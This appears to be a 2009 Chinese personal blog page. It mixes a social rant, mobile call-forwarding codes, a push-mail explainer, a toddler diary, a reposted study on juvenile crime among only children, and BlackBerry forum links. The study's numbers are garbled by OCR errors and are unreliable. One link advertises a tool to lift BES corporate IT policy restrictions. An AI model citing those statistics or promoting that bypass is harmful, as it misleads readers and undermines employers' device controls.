我是农民,我最倒霉。你们收了我们的地,升了你们的鸡的屁(GDP)。你们也别高兴得太早。给你们这些城里人吃喂过饲料的猪肉,吃死你们。
人不坑我,我也坑人。人若坑我,我必倍坑人。
人们相信,那些教科书里面说的,官方台面说的道德说辞,都不是真的。
真的东西,都藏在台下和幕后、、、
生活会一次一次的努力改变都失败了:一个潜规则的社会,是一个假定人人恶意、没有信仰的社会,很多的人敢于公然做恶,也从不相信有什么因果报应。
人们也习惯于穷凶极恶,与狼共舞。
然而,只要这个社会好人倒霉,恶人得势,没有人相信善有善报,恶有恶报,那么,谁人不是冤大头?
不论是一个商铺,一个产业,抑或一个社会,没有基本的是非曲直,没有基本的道德良心,没有基本的信任规则。哪里都只是丛林。到处都只有潜规则,哪里就只有完蛋的份。
一次一次的努力都会打了水漂,一次一次的崩溃是不可阻挡的。所有的未来都建立在砂砾之上。
出来混,迟早是要还的。
喷嚏网:原创 www.dapenti.com
2009年8月3日星期一
呼叫转移
功 能 设 置 取 消 查 询
无条件转移 **21*电话号码# ##21# *#21#
无信号转移 **62*电话号码# ##62# *#62#
无应答转移 **61*电话号码*10*响铃时间# ##61# *#61#
遇忙转移 **67#电话号码# ##67# *#67#
呼叫转移资费
・ 客户呼叫转移至留言信箱免收呼叫转移基本费。移动呼叫转移基本费为:0.20/分钟
・ 无条件呼叫转移:基本通话费+归属地至前转地的长途费用
・ 有条件呼叫转移:基本通话费+归属地至漫游地至前转地的长途费用
如想清除所有的呼叫转移设置,可按"##002#"
呼叫转移的四种方式
1. 关机及不可及转移
此功能设置后,当您不开机、无SIM卡、无线链路拥塞或超出覆盖区时,所有其它呼叫您手机的来电均将被转移至预先设置的另一号码。
2. 遇忙转移
当您正在使用手机通话时,另一个打入的电话会自动转移到您预先设定的另一个号码上。
3. 无应答转移
当您的手机处于开机状态时,打入的电话接通但无人接听,来电会自动转移到您预先设定的另一个号码上。
4. 无条件转移
将所有呼叫您手机的号码全部转移到您预先设置的另一手机、移动秘书、语音信箱或市话,您的手机不再振铃。
注意;
关机及不可及转移、遇忙转移和无应答转移三种方式中,您可以同时设置一种或数种呼叫转移方式。
无条件转移具有最高优先级,当设置此项功能后,另三种转移功能自动失效。
关于push mail的种种
By Charles on Jun 26th, 2009 | 217 Views
Push Mail应用,是黑莓手机赖以成名的绝技,非常遗憾的一件事情是,在中国,这项业务是收费服务,而且价格不菲。但是,随着中国移动通信行业的发展,Push
Mail的概念日渐火热,其门槛不断降低,再非昔日的高不可攀,最近一段日子,我不禁对这项应用倍感兴趣。
上一篇介绍E63的使用体验的文章中,我已经提到了这个东西。但是,事实上,我对其的了解是非常有限,我只是根据心目中的想象,将我现在享受到的服务,认为是Push
Mail。而实际上,通过在互联网反复搜索,我还是没有实现对这项服务的深入了解。感觉国内做这个的有好几家公司,包括著名的尚邮,另外就是一些移动运营商和知名度较低的公司,但是我觉得这些公司里,不乏玩弄概念,欺瞒客户的现象。
什么是Push Mail?
Post Office Protocol(邮局协议),就是我们常说的POP3,是互联网上广为使用的邮件投递协议。接收邮件时,用户通过客户端,登录邮件服务器,从服务器上检索新邮件,并下载到客户端查看,而发送邮件之时,却是客户端将邮件直接发送到了目标服务器(也即直接发送到了收件人地址所在的邮件服务器)。以上所描述的方式,就是传统的邮件处理方式,也即与Push
Mail相对的Polling Mail。
Push Mail真正与Polling
Mail不同的,就是在发送邮件之时,邮件不是到达了目标地址所在的服务器就停止的,而是再进一步地被送到了收件人的客户端之中。听起来,这种处理方式的好处是不言而喻的,最重要的优点,就在于实时性非常的高。
既然这种方式是如此的优秀,为什么没有被广为采用呢?事实上,这是一个历史原因。我们都知道,现在互联网的主要使用的协议还是IPv4,这种协议使得IP地址的数量非常有限,并不能满足给接入网络的每个终端一个地址的需求,现在的方案,是大量的桌面终端用户,接入互联网时,动态地分配其一个IP地址,数量较小的服务器,被分配了固定的IP地址。这种方式,暂时性解决了IP地址不够用的问题,但是同时,也使得每个终端无法享有独一无二的IP地址。回到我们的问题上,这样一来,邮件服务器就无法知道,到底要把邮件投递到哪个地址,于是,只能够放在服务器的存储中,等待客户端主动连接上来查看邮件。
说个题外话,随着互联网的发展,同一时间接入互联网的终端和服务器数量日益增加,IPv4这种动态分配的方式,也开始变得捉襟见肘,IP地址成了日益稀缺的资源,于是乎,IPv6应运而生,这种新的IP协议号称可以给地球上的每一粒沙子都非配一个IP地址,可见其地址数量是何等地庞大,等到IPv6全面使用之时,每个个体(我特意没说是人,被人类管理的动物也包含其中)在出生之时,像得到身份证号码一样得到一个IP地址应该是非常正常的事情。届时,Polling
Mail这种方式,也该理所应当地退出历史舞台了吧。
通过手机实现Push Mail
我们都知道,每一台接入通信网络的手机,都有一个唯一的手机号码,这就使得将邮件直接投递到手机上,成为了可能。事实上,很多文章上也提到了,我们所熟知的彩信,其本质就是一种Push
Mail,只不过发信人地址和收信人地址都是手机号码,而非邮件地址。当然,可能的事情办起来也并非如此容易,无线通信网络和互联网是两种不同的网络,要从互联网,将邮件穿透网络发送到无线通信网络中,必然无法避开通信运营商这一关。所以,在手机上实现的Push
Mail,必须有无线通信运营商的支持。
中国在这个领域起步较晚,所以,刚开始,这样的业务必然资费高昂,但是资费的下降,眼看着就是必然趋势。
我用过的几种手机接收邮件的方案
我用过的使用手机接收邮件的方案非常有限。现在我就放在一起来说说:
手机浏览器――手机通过GPRS上网,从Web页面直接收取。这种方式,就和普通的上网收邮件是一码事。想起来了去收一下,你需要承担的费用只是流量费。当然,这个全然没有实时性可言了,就是你自己想起来,收一下而已。属于彻底的Polling
Mail方式。
Gmail客户端――这是智能手机上的一个应用程序,目前在绝大多数智能手机平台上可用。该程序运行于系统后台,每隔固定的时间,就通过GPRS网络访问Gmail服务器,从服务器上下载新邮件。使用Gmail客户端,你需要负担的费用也只有流量费,当然这个程序一直运行在系统的后台,会使手机的电量迅速地被消耗,这也是你所必须承担的,经常给手机充电。通过这个客户端,基本实现了实施查收邮件,你可以把检索服务器的时间间隔设置成3分钟,甚至更短,几乎就是实时,当然检查服务器越频繁,流量消耗越多,电量消耗也越多。这种方式还是属于Polling
Mail。
尚邮客户端――尚邮是我在使用了黑莓后才听说的,不知道为什么,尚邮一直吹嘘自己是Push
Mail,不过根据我的理解(见上面),至少其免费版本,绝对不是Push
Mail。尚邮的免费版本,和Gmail客户端的性质并没有区别。几乎一模一样。甚至根本赶不上Gmail。使用尚邮免费版本,你需要承担的代价和使用Gmail客户端完全相同。区别就是Gmail从来没吹嘘自己是Push
Mail,而这个牛皮,尚邮吹了。其原理,从外表上看,也是Polling
Mail,如果退出了尚邮客户端,你就无法收到邮件了。所以,你根本无法知道,开着尚邮客户端,邮件到底是被Push过来的,还是客户端自己去刷新出来的(根据Push的原理,尚邮完全没有和手机号码关联,可以推断,邮件肯定不是Push过来的)。当然,尚邮也推出了很多价格不菲的收费服务,也一概说自己是Push
Mail,我没有用过,不敢妄加评论他们到底是不是真正的Push Mail,从情感上,我还是相信尚邮没有这么无耻的。
139邮箱――139邮箱是中国移动推出的一项业务,我所在的浙江移动,有这项业务,其他地区不详。139邮箱绝大部分功能和普通电子邮箱一样,区别可能就是这款邮箱带有Push
Mail业务。我使用的免费版本,带有邮件到达提醒。在邮件到达的第一时间,发送一条手机短信给用户,告知邮件到达。发送的格式有多种版本。有只发送邮件标题的,发送70字标准短信的,发送350字短信的,和发送彩信的几种方式,如果使用彩信的话,基本上就把邮件完整地发送到手机上了。这种方式,不需要在手机后台开任何程序,不会浪费电,而你真的会在邮件到达的第一时间看到邮件的内容。根据我的理解,这个就是Push
Mail了。因为是直接抵达客户端的,而不是你主动去收取的。这个邮箱还带有两个收费服务,叫做Push
Mail5元版和20元版,区别是邮箱容量和附件大小。不过收费服务也需要安装客户端软件,我没有用过,不过在网上看到有人用,说是就算不启动客户端软件,还是可以收到邮件。真要是这样,那么邮件也是被Push过来的了。
要是这样的话,就真的意味着在中国,用上Push Mail业务,只要支付每月少于20元的平民价格了,而非黑莓的那个300+的天价。
好,今天就写到这里了,我自己理解的内容,和我自己试用过的方案都在上面了,欢迎纠正我的错误和给我推荐更好的方案。
转自http://sexywp.com/what-is-push-mail.htm
善宝成长记录
最近小善宝善于简化发音了。比如推小车的时候,不让我推,非得让妈妈推,直接喊着"妈推",让妈妈喝水的时候,就喊"妈喝",声音非常清晰。那本看图学东西的小册子,十来页的东西,全都能指对,并说出正确的名字了,每次问的时候,都是百分之百地答对。而且有好几个是最喜欢说,一下子能联系到其它东西上面的。驴,发音成"路",还有饼干,发音成"崩干",呵呵,稚嫩的声音,非常可爱。也总有麻烦的时候,看到奶牛,总是联想到喝奶,不给喝还不行,高扯着嗓子,象游行示威似的,"喝奶喝奶喝奶。。。。",妈妈让他还找我,他倒也听话,转过头来就骚扰我了,直拉着我抱着我,贴上来他软乎乎的小身子,抱紧了大腿不放松,直到逼的大人投降为止。
好宝宝倒也不哭不闹。前几天到南部山区玩儿,回家的路上,小善宝不知道怎么了生妈妈的气,坚决不让抱,非得自己站着,过了一会儿,上下眼皮直打架,小脑袋慢慢耷拉下来,又忽一下抬起来,就象早年爸爸在课堂上听讲的样子,都已经瞌睡成那样了,还是不让抱,非要坚持自己站着。呵呵。在路上睡了几分钟,一到家又开始折腾起来,和爸爸在书房的坐垫着玩儿。直累的爸爸躺下来,一会儿清醒一会儿迷糊,清醒的时候,就听见小善宝一个人在指着书上的插图,嘴上念念有词,不知道在说些什么,过一会儿,再换本书,从头到尾再翻一遍。最后过了不知多长时间,一个人坐在墙边的靠垫上,又开始打起瞌睡来。
猛然,楼下装修传来一阵剧烈的电钻声响,吓的我一下子清醒起来,小善宝也吓的一下子靠到我的怀里,我连忙安抚着他,没事没事,楼下装修呢,没事没事,小善宝也学着我的口气,"没事没事,楼下装修,楼下装修,楼下装修",还没说完几个"楼下装修",就枕在我的胳膊上,呼呼地睡起大觉来,任凭楼下传来震耳欲聋的电钻声,还是睡的很响,我打电话给妈妈,妈妈从卧室跑过来,抱着宝宝到床上睡觉,一直也没有醒,睡的可是香呢。
睡了一觉,明显忘了车上的事,一点儿也不生妈妈的气了,相反,靠着妈妈要饭吃,抓着一块鸡肉,香香地啃起来,呵呵。
2009年7月28日星期二
不服管教,滋意妄为的半大小孩怎么办?
山东省少年管教所
作者:李康熙 转贴自:武鸣县新闻信息中心
内容提要:我国的独生子女犯罪已成为社会各界所普遍关注的重点问题之一。
作者通过查阅未成年犯档案、个别谈话、问卷调查等形式,对当前未成年独生子女犯罪问题进行了认真调查分析,归纳概括了未成年独生子女犯罪的基本状况和心理行为特点,探讨了未成年独生子女犯罪的内在原因,预测分析了独生子女犯罪的发展趋势,并有针对性地提出了预防未成年独生子女犯罪的基本对策。
进入90年代以来,我国的独生子女犯罪问题已成为社会各界广泛关注的热点问题,为新时期的社会治安综合治理提出了一个新课题。据笔者近期专题调查,某省少年管教所、女子监狱在押未成年犯中系独生子女的共有188名,已占到全省在押未成年犯总数的17.62%,是1990年的6倍,并呈继续上升的发展趋势。因此,调查分析当前独生子女犯罪的基本状况、心理特点和成因,研究提供预防对策,具有十分重要的现实意义。
一、未成年独生子女犯罪的基本状况及其构成特点
调查结果表明,进入叨年代以来未成年独生子女犯罪不仅在数量上迅速增加,而且在犯罪年龄。类型、性质以及在捕前身份、文化程度、家庭成员构成等方面与未成年非独生子女犯罪相比呈现出明显的特点。
1.犯罪年龄偏低。
在押188名未成年独生子女犯的初次犯罪年龄分别为:14周岁的22名,历周岁的61名,16周岁的72名,门周岁的对名。他们初次犯罪的平均年龄为15.61周岁,比在押末成年非独生子女初次犯罪的平均年龄低0.5l周岁,其中有8名在14周岁前就有违法劣迹行为。未成年独生子女犯罪的低龄化,令人十分担扰。
2.侵财犯罪的多。
从犯罪类型上看,未成年独生子女犯中犯盗窃罪的72名。抢劫罪的69名、好淫幼女罪的14名、强奸妇女罪的门名、故意杀人罪的10名、故意伤害罪的8名、流氓罪的2名、绑架勒索罪的1名(他们中一人犯二种及其以上数罪的有26名,这里只选其中一项主要的)。侵财犯共有142名,占75.53%,比在押侵财型未成年非独生子女犯所占的比数高出3.92个百分点。未成年独生子女实施盗窃、抢劫、绑架勒索等侵财犯罪有两个鲜明的特点:一是受好奇、刺激的诱惑所为,二是为了吃喝玩乐。
3.犯罪危害严重。
从刑期构成上看,未成年独生子女犯中不满7年刑的132名,7年以上不满10年刑的有28名,10-15年刑的有25名,无期徒刑的有3名。10年刑以上的重刑犯合计有28名,占
14.89%,比未成年非独生子女重刑犯所占的比数高出2.58个百分点。近年来未成年独生子女由于受社会上暴力、色情等不健康影视、书刊的影响,犯罪常常具有很大程度的疯狂性,作案不计后果。从独生子女重刑犯明显偏多可以看出其犯罪危害的严重性。
4、文化程度偏低且辍学流失生占大多数。
从目前文化程度上看,未成年独生子女犯中文盲的4名,小学未毕业的27名,/J''''学毕业至初中毕业的108名,初中毕业及其以上文化的有49名,其中包括高中。中专、技校在校生厂名(这里所说的文化程度仅为表面显示,并非他们的实际文化水平)。由此可以看出,未达到初中文化的合计有139名,占73.94%,比同类型未成年非独生子女犯所占的比数高出5.46个百分点。调查中还发现,未成年独生子女犯中捕前系在校生的仅有
48名,占 25. 5%,而未达到初中毕业便辍学、流失到社会上的有 113名,占 60.
11%,比同类型未成年非独生子女犯所占的比数高出286个百分点。
5. 社会上闲散人员占大多数。
从目前身份上看,未成年独生子女犯中在校生48名,待业49名,务农的65名,工人对名,个体经商的5名。调查中发现,除去48名在校生和ZI名工人外,末成年独生子女犯大多原在计会上属于闲散人员,辍学后重活干不了,轻活不想干,整天在社会上吊儿郎当闲耍取乐。
6.家庭结构破裂的多。
调查统计的结果显示,未成年独生子女犯中捕前长期生活在结构破裂家庭里的明显偏多,其中亡父的6名,亡母的14名,父母离婚的问名,父或母与他人私奔的2名,父或母服刑、劳教的3名,合计45名,占23.94%,比同类型木成年非独生子女犯所占的比数高出4.94个百分数,家庭结构破裂容易给子女打上极为有害的心理烙印,影响子女的社会适应,导致子女违法把罪。同时,不容忽视的是心理破裂的家庭对未成年独生子女犯罪更有影响。从问卷调查中得知,未成年独生子女犯中占46.8%的人承认自己被捕前长期生活在父母经常争吵对骂、充满紧张冲突气氛的家庭环境里。由此可见,对未成年独生子女犯罪的影响并不只是缺少一个家文,而是取决于家长与子女的亲情关系。
二、未成年独生子女犯罪的心理行为表现及其成因
l、以自我为中心的意识强。
多数独生子女犯原在家庭中是"小皇帝",长期生活在"大家围着转"的家庭环境里,家庭经芽状况普遍较好,家长对其处于服从地位,千方百计地满足他们的各种愿望和要求,结果使他司逐渐形成了以我为中心的意识,为所欲为,十分任性、自私、贪婪和霸道。他们只注重自己的经受,只想自己吃得好、穿得好、用得好、玩得好,却较少顾及甚至木顾及他人的利益,其中最为月显的不太注重名誉,而崇尚金钱,追求自身利益,追求高消费,争强好胜而缺乏进取精神,甚巨为了达到目的不择手段。这已成为未成年独生子女犯罪的一个重要原因。入监服刑后,尽管鱼们已不能再为所欲为、吃喝玩乐,但其以我为中心的意识仍有明显的表现:一是在生活上继续追求享受。有的父母已经下岗,收入微薄,但他们全然不顾,仍是经常写信向家中索要高档食品、日用品,有的甚至以断绝关系相要挟。二是在犯群中的人际交往上,表现出自私、嫉妒。三合群等特点,一旦交往受挫便会产生报复心理。三是在认罪悔罪上,把犯罪原因推向客观,f分强调自己是法盲和失足者,不从主观上找原因,只谈自己被判刑受惩罚的痛苦,却不说自己的犯罪给受害人给社会带来的严重危害。
2.感情脆弱,承受挫折能力差。
独生子女在成长过程中大多一帆风顺,受到家庭的过度保护,习惯于被别人围着、护着、捧着,从未尝过"逆境"滋味,不知道什么困难。在日常生活中,他们不能控制自己的不良行为习惯,甚至不能应付一些较小的挫折,心理承受力非常脆弱。他们在遇到不顺利时,往往表现出过分的失望、焦虑、沮丧情绪,甚至意志消沉,自暴自弃,不能客观地分析现实条件和自我状况,使挫折的不利方面在其身上表现得非常明显,以致影响他们的健康成长,甚至走向违法犯罪道路。例如,学习是件艰苦的劳动,上课要认真听讲,课后要完成作业,无论喜欢不喜欢,一个人到一定年龄都要在一个学校班级中生活,与老师同学打交道。要适应学生生活,独生子女要付出比他人更多的努力,但这对于那些任性拨了,又缺乏克服困难、应付挫折毅力的部分独生子女来说都会成为难事。调查结果表明,未成年独生子女犯原在社会上辍学的真实原因是在遇到考试失败、升学落榜、同学矛盾、师生误会、丢钱失物、父母离婚或死亡等挫折时,既缺乏适应能力,更缺乏战胜困难和应付挫折的能力,只好采取消极的方法,导致厌学。逃学、辍学行为的发生。这些中途辍学流落到社会上的独生子女,由于没有适当的资格(文化知识、文凭、专业技术等),难以找到良好的职业,称心的工作,容易在社会上闲逛,从文化娱乐场所中受到不良影响,容易在不良刺激的诱惑下,萌发违法犯罪的念头。同时,他们也容易被社会上不法分子教唆、拉拢进行违法犯罪活动。
3、依附性强而生活自理能力差。
多数新收押的独生子女犯,不会洗衣服,不会铺床叠被,不会整理自己的物品,有的甚至在家时连饭碗也未曾洗过,独立生活能力很差;有的日常改造中遇到一点困难和挫折就无所适从,就哭鼻子。由此可见,他们是在溺爱娇惯的家庭环境中长大。许多家长对自己的独生子女过分迁就,进行过分保护,不让子女做家务活,而由自己全部包揽,有的甚至连子女的家庭作业也代替去做。一些经济条件比较富裕的家庭,雇佣别人干家务,不让子女干哪怕是十分轻松的体力劳动。很多家长的确是辛辛苦苦地好心干坏事。因为他们对子女这种无原则的疼爱和过分保护,剥夺了子女学习生活技能的机会,客观上阻止了子女的全面发展和健康成长。从未成年独生子女犯罪的特点可以看出,溺爱娇惯、过分保护不仅会导致子女生活能力差和意志力差,经不起任何挫折,而且会使子女养成好吃懒做、自私任性、冷酷残忍、乖戾蛮横、脾气暴躁的性格特征,还会使他们随着年龄的逐渐增大,物质欲求恶性膨胀,当家庭满足不了自己欲望时,便会挺而走险,走上违法犯罪的道路。
4. 好逸恶劳心理突出。
好逸恶劳的心理指喜欢安逸、享乐,厌恶劳动的心理。多数未成年独生子女犯从小生长在"衣来伸手、饭来张口"的优越家庭环境里,逐渐养成了鄙视劳动、厌恶劳动的不良习惯。问卷调查结果表明,他们原在社会上总是千方百计地逃避劳动:在学校组织劳动时,他们常用生病、身体不适等借口推托;在家中把自己应当做的家务完全推给别人,起床后不整理床铺,平时不打扫房间,做饭不用自己劳动,洗衣服不用自己动手。有的甚至花钱雇请同学帮助自己做作业。与此同时,现代家庭生活水平高了,使得独生子女有条件享受到丰富的物质生活,能够有钱购买自己喜欢的衣物用品、食品和玩具,能够有机会去公园、游艺场甚至去卡拉OK歌舞厅。于是,他们就千方百计地从父母或亲戚朋友那里搞钱去从事物质享乐活动。许多父母过分娇惯溺爱和迁就子女,也就尽可能多地给子女钱,从而助长了他们的物质享乐欲望。正如有的独生子女犯在问卷中答道:"不劳动照样可以轻轻松松地从父母那里得到钱,参加劳动还要花费力气,不如从父母那里要钱痛快,"正是这种轻视劳动锻炼的结果,才使得他们懒惰成性,厌倦学习,不关心将来的前途,也不愿为自己将来的发展努力学习,得过且过,不思进取,只想吃好喝好穿好玩好。相反,他们中的部分人却沉溺于外国、港台影视片、武打言情小说、酒吧歌舞厅。吸烟喝酒等,用来消磨时间,打发无聊的日子,用直观性、刺激性的低级娱乐活动来麻醉自己。这样便会使他们的物质享乐欲望不断膨胀,物质需求不断扩大和增强,当他们赖以生活的经济来源丧失,或者不能满足他们贪得无厌的需要时,就会用违法犯罪行为去维持好逸恶劳的习惯、走上违法犯罪的道路。
5.人际交往能力差,缺乏"社会性"、"独立性"。
多数来年成独生子女犯自我意识较强,在人交往中表现出自私、任性、嫉妒、自卑、感情易冲动等不良特征,在日常生活中常为一些"鸡毛蒜皮"小事而相互对立,甚至大打出手。他们习惯于接受别人的夫怀和忍让,很少荣心体谅别人的心态和行为习惯,过多关注自己的需要,很少考虑别人的感受。一旦交往受挫,即当自己的言行不被别人接纳、希望得到别人尊重的需要得不到满足时,便自觉与人交往没有乐趣,进而把自己封闭在一个狭小的天地里,苦闷、忧伤,成为"孤家寡人",或者一旦交往受挫,容易产生孤独、报复心理。这也是造成一部分未成年独生子女激情报复、伤害、故意杀人犯罪的一个重要原因。如独生子女犯徐某,历岁,捕前正在初中三年级读书。徐某与同学沈某关系一向较好,只因初二学期末徐某考试成绩不佳,老师便让沈某替代徐某担任了班中学习委员,徐某便产生了嫉妒、孤独、报复心理。1997年3月24日上午课间在厕所解手时,沈某与徐某开了一个下流玩笑,徐某便恼羞成怒,对沈进行殴打,被在场的同学拉开。到教室后,徐某自感仍没解恨,便抄起方授向沈某砸去,致沈肩肿骨严重骨折,徐某被当地人民法院以故意伤害罪判刑4年。
三、对未成年独生子女犯罪的预防对策
随着我国独生子女数量的不断增多,其犯罪必将成为一个严重的社会问题。这是因为部法家庭不能完成对独生子女的教育任务,特别是那些素质不高的家庭、婚姻破裂以及残缺不全为家庭更是这样;学校教育需要迫切解决的问题颇多,如增大投入、进行教学改革、全面推行素员教育等,均非一朝一夕所能办到和办好的事;社会环境污染已成为公害,净化治理更需假以寸日。因此,加强对独生子女犯罪预防的研究工作极为重要。未成年独生子女是祖国的希望,员防和减少他们的犯罪是全社会的大事,是一项涉及面极广的社会系统工程,完成好这项工是,需要动员全社会的力量,同心协力,群策群治。笔者认为,在此基础上应重点抓好以下几方面的工作:
l、加强家庭教育功能,把住家庭影响关。
家长是子女的第一任老师,家长自身的文化修养、道德水准和言行对子女品德的塑造、气质的形成、人格的完善等极为重要,所以我们应当把住家庭影响这一关。从未成年独生子女犯罪的原因可以看出。当前在家庭教育方面确实存在不少的问题。家长一定要品行端正,为子女作出表率,用正确的观点和方法关心教育子女,增强爱的目的性、教育的自觉性,做到爱教结合、爱而有度,既不能百般溺爱,又不能简单粗暴,而是宽严得当,晓之以理,动之以情,努力把转化为教育独生子女健康成长的强大力量,使他们真正体会到家庭的温暖和家长对自己的心,不致于产生抵触情绪或离家出走。
2.变应试教育为素质教育,充分发挥学校教育的主导作用。
学校要真正把基础教育作为塑造中小学生健全人格的"启蒙教育"。彻底改变那种只重分数、片面追求升学率的不良倾向。学校要在传播文化知识、培养兴趣爱好、引导个性发展的前提下,着重抓好精神文明教育、道德法制教育、公民意识教育以及青春期教育和心理卫生教育,使学生首先学会做人。这样他们将来才会成为一名对祖国有忠心、对社会有爱心、对家长有孝心、对他人有关心、对自己有信心的高素质公民,才能自觉抵制社会不良风气的侵蚀和精神垃圾的毒害。
(1)做好"落差生"的教育转化。
当今确有不少的独生子女任性、自私、贪玩,片面追求高消费、高享受、怕苦怕累、无心学习,上进心不强,教师应与家长携手做好教育转化工作,帮助他们克服学习生活中的困难,指导他们树立正确的人生观、价值观,激发他们的学习兴趣,使他们感受到学校的温暖,避免发生逃学、辍学现象。
(2)抓好社会化教育。
部分独生子女从小骄生惯养,缺乏独立生活能力,社会适应性差。学校应当加强良好行为习惯训练,着重进行意识、品德方面的培养和锻炼,提高学生独立生活和应付各种困难的能力,养成良好的生活习惯,增强适应纷繁复杂社会的能力。
(3)抓好心理卫生教育。
未成年独生子女一般所处的生活条件较好,身体发育较快,但是在心理和社会方面的成熟过程相对而言比较缓慢,因而使中小学生产生大量的心理失衡现象。因此,学校应该根据学生的心理特点,大力普及心理卫生知识,开展心理咨询,进行个别指导,以增强他们自我认识、自我排解、自我调节的能力,帮助其克服和纠正心理缺陷和心理障碍,防止不良行为的发生,培养其自信自强、热爱生活、乐观处世、积极向上的健康心理。
(4)抓好群体教育。
这是针对独生子女"独生"的特殊生活环境采取的一项对策。一个优秀集体是学生思想品德形成的最佳环境。中小学生有好奇好强、爱说爱动的心理特点,乐意参加内容丰富广泛、形式新颖多样的集体活动。学校应利用集体的力量来帮助引导独生子女克服不合群、自私任性和以个人为中心等心理缺陷,通过组织参观访问、参加社会公益劳动等活动,培养他们从爱学校、爱家乡升华到爱祖国;从爱同学、爱长辈提高到爱人民。
3.净化社会环境,减少诱发犯罪的因素。
社会环境不仅对成年人,尤其对未成年人影响极大。因为未成年时期的认识能力、自身的行为控制能力和抵御外来诱惑能力均很低,辨别是非的能力也比较弱,故很容易受社会不良习性、风气的影响和诱惑。如今社会上的黄毒赌仍不同程度的严重存在,是腐蚀未成年人的污染物。此外,市场经济条件下的不正当竞争,社会上存在的许多非法交易和阴暗面,都会不同程度地对未成年人的心灵产生极大的诱惑。故笔者认为,整顿社会风气、净化社会环境是当前预防独立子女犯罪的重要一环,必须抓紧抓好。
4、加强监管教育力度,预防重新犯罪。
首先,基于独生子女犯罪的内在原因是人生观的颠倒,以及生理心理所表现出来的幼稚。不成熟、不定型,争强好胜,辨别是非和承受挫折能力差等特点,对他们执行刑罚应以教育改造为主,强化思想道德和法制教育,丰富他们的精神世界,净化他们的灵魂,增强他们的社会责任感,提高他们自我控制、自我约束的能力,增强免疫力。其次,基于未成年独生子女犯中"双差生"、"辍学流失生''''哆,实际文化水平低和正处在长身体长知识的年龄的特点,少管所要发挥特校的功能,积极配合。
2009年7月21日星期二
黑莓blackberry需要收藏的资源
★★★特别推荐★★★
81 83系列不拆机可以大体上辨识出板机来 http://bbs.maxpda.com/viewthread.php?tid=243003
让我们挽救某些可怜的同学吧,键入mepd跟帖吧
http://bbs.maxpda.com/thread-237349-1-1.html
不能指望JS自律 团结起来 集思广益 如何分辨硬解 打孔?
http://bbs.maxpda.com/thread-238482-1-1.html
Blackberry 5800~8700_8800拆机图-PDF&部份拆机Video-FLV
http://bbs.maxpda.com/thread-16759-1-1.html
[小N原创]解决滚轮不灵敏问题,如何拆机+清理滚轮(适用于所有滚轮机型,清晰大图)
http://bbs.maxpda.com/thread-180377-1-1.html
8700滚轮(其它型号应该通用)上图说明如何让你“出轨”的滚轮对你唯命是从 2009.3.20更新
http://bbs.maxpda.com/thread-210929-1-1.html
如何清理检查拆装轨迹球的教程
http://bbs.maxpda.com/viewthread.php?tid=171159
81 83 88系列发货前刷机装软件设置+买家到手设置过程
http://bbs.maxpda.com/viewthread.php?tid=157491
黑莓83系列 88系列预装软件一览 私家教程放出
http://bbs.maxpda.com/thread-213289-1-1.html
擦亮眼睛 都是全套 猫腻很多 选购黑莓要注意选择 加入8100电池对比
http://bbs.maxpda.com/viewthread.php?tid=133262
ROM和同步软件可以到我们的软件下载网站下载
http://down.maxpda.com/
或者到Vodafone香港的网站上去找
http://www.smartone-vodafone.com/jsp/business/mobile_email/blackberry/tchinese/software_download.jsp
【打造一个牛X的地址簿】BB72系测试通过,理论上普适于所有黑莓。
http://bbs.maxpda.com/viewthread.php?tid=124088
wifi wap net通过EQO上QQ MSN AIM yahoo! GoogleTalk。。。。
http://bbs.maxpda.com/viewthread.php?tid=241568
联通卡使用自带浏览器[增加图文教程]
http://bbs.maxpda.com/viewthread.php?tid=113222
斗战胜佛全力推荐 7130刷机 基本设置 常用软件 截图+下载
http://bbs.maxpda.com/thread-126827-1-1.html
斗战胜佛全力推荐 8300刷4.5ROM 基本设置 常用软件 截图+下载
http://bbs.maxpda.com/thread-126077-1-1.html
斗战胜佛全力推荐8100刷机 OS45 【15日加区号秀 农历】
http://bbs.maxpda.com/viewthread.php?tid=131056
Blackberry Bold 9000 装机软件大集合
http://bbs.maxpda.com/thread-179661-1-1.html
翻盖珍珠黑莓8220的一些隐藏按键操作和其他技巧
http://bbs.maxpda.com/thread-211982-1-1.html
黑莓8900基本必备设置和原创软件 8楼 4.15更新中
http://bbs.maxpda.com/thread-219784-1-1.html
7130 8700 8100 8800 8300 4.2ROM机型的蓝牙 图铃 上网等相关教程
http://bbs.maxpda.com/viewthread.php?tid=118056
轨迹球机器 TF卡的使用等相关问题的解答
http://bbs.maxpda.com/viewthread.php?tid=139427
WIFI机型的wifi使用简单图文教程
http://bbs.maxpda.com/thread-166560-1-1.html
8820 WI-FI上网问题解决方法
http://bbs.maxpda.com/thread-215623-1-1.html
88系列放sim卡 放tf卡 经常有人会问的 上图看看 呵呵
http://bbs.maxpda.com/thread-171436-1-1.html
双屏翻盖黑莓8220 外屏和内屏 贴膜过程 2009.3.16
http://bbs.maxpda.com/thread-210123-1-1.html
解除BES IT POLICY 限制 小程序 刚用批处理写的 谢谢kergee
http://bbs.maxpda.com/thread-133406-1-1.html
DTG 可以编辑word excell ppt还可以阅读pdf
http://bbs.maxpda.com/viewthread.php?tid=139806
【时间大法】总结帖,经验分享
http://bbs.maxpda.com/viewthread.php?tid=151399
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
看电影 81 83 88 89 9000 9500等轨迹球机器支持3GP AVI MP4
推荐自己转换 下载暴风影音转码器
http://www.baofeng.com/mediaenc.html
也可以去这个网站下载现成的MP4
http://www.80s.cn/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
8310 8820等内置gps
本地地图+GPS制作续,带上OziExplorer 汉化+注册+已转化好的陕西地图240*260
http://bbs.maxpda.com/viewthread.php?tid=114581
Trekbuddy免费gps使用简介含地图制作
http://bbs.maxpda.com/thread-113678-1-1.html
黑莓8800安装乐图GPS导航过程实录 (其他型号可以参考)
http://bbs.maxpda.com/thread-127847-1-2.html
乐图设置使用图片说明(乐图1.7更新推出卫星地图,欢迎体验.....)
http://bbs.maxpda.com/thread-159850-1-1.html
乐图设置使用设置图片说明(V2.0 alpha 3离线版,各种建议,站内信.....)
http://bbs.maxpda.com/viewthread.php?tid=159850
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
收发邮件
顺利用gmail的托管功能接收163邮箱的邮件,已经贴出详细步骤。
http://bbs.maxpda.com/viewthread.php?tid=74382
4.5OS下 推荐类似于outlook的pushmail 收发邮件方法
